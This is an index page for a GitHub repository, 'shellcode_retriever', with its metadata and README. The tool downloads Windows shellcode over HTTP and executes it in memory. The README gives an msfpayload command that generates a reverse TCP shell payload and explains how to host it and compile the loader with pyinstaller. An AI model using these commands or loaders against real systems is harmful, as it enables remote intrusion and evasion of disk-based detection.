Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/byt3bl33d3r/shellcode_retriever
Downloads shellcode over HTTP and executes in memory. Now with threading! Rejoice!
https://github.com/byt3bl33d3r/shellcode_retriever
Last synced: 15 days ago
JSON representation
Downloads shellcode over HTTP and executes in memory. Now with threading! Rejoice!
- Host: GitHub
- URL: https://github.com/byt3bl33d3r/shellcode_retriever
- Owner: byt3bl33d3r
- Fork: true (secretsquirrel/shellcode_retriever)
- Created: 2015-02-06T20:21:23.000Z (almost 10 years ago)
- Default Branch: master
- Last Pushed: 2015-09-16T13:51:53.000Z (about 9 years ago)
- Last Synced: 2024-07-03T09:20:55.853Z (4 months ago)
- Language: Python
- Homepage:
- Size: 88.9 KB
- Stars: 22
- Watchers: 2
- Forks: 14
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
##Shellcode Retriever
Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)
Modified for threading by yours truly.
Original demo video:
http://www.youtube.com/watch?v=R15B2p-uWKY
---
For use by IT Security professionals and researchers.
Usage:
Create shellcode using the following msfpayload command:
msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt
Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.
Upload the shellcode to your webserver.
Compile the python code to an executeable by using pyinstaller.
---
##License: GPLv3
Shellcode Retriever
Author Joshua Pitts the.midnite.runr 'at' gmail com
Copyright (C) 2013, Joshua PittsLicense: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.See for a copy of the GNU General
Public LicenseThis program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.